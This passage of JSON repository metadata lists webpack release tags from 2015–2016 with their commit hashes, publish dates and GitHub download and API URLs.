ags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at"